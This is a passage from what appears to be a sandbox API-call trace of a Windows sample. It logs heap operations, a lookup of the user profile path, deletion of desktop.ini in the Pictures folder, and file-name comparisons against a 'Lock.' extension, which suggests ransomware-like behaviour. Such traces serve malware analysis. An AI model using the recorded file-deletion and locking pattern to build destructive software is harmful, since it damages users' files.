hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0254.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0254.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0254.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.869] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.869] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0254.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.869] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.870] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0254.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.871] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0254.871] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.871] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0254.872] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.872] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0254.872] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.872] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.872] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.872] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0254.872] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.872] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.872] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.872] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.872] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.872] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.872] FreeLibrary (hLibModule=0x74d40000) returned 1 [0254.873] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.873] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.873] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.873] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.873] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.873] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.873] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0254.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0254.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0254.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0254.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0254.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0254.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0254.874] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0254.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0254.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0254.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0254.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0254.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0254.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0254.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0254.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0254.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0254.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0254.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0254.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0254.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0254.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x66) returned 0x24202f0 [0254.875] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/desktop.ini", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", lpFilePart=0x8bedfc*="desktop.ini") returned 0x32 [0254.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0254.875] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini")) returned 0x26 [0254.875] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x1512, dwReserved1=0x4, cFileName="desktop.ini", cAlternateFileName="")) returned 0xaa5860 [0254.876] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini")) returned 1 [0254.877] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x1512, dwReserved1=0x4, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0254.877] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0254.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0254.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0254.877] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0254.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0254.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0254.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0254.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0254.878] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0254.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0254.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0254.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0254.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0254.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0254.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0254.878] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0254.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0254.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0254.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0254.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0254.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0254.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0254.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0254.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0254.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0254.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0254.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0254.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0254.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0254.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0254.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0254.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0254.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x66) returned 0x24202f0 [0254.881] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/desktop.ini", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", lpFilePart=0x8bf658*="desktop.ini") returned 0x32 [0254.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0254.881] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini")) returned 0xffffffff [0254.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0254.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0254.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0254.881] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0254.881] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.881] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0254.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0254.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0254.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0254.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0254.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0254.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0254.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0254.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E3PCt.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3PCt.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PCt.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ct.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0254.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0254.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0254.883] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 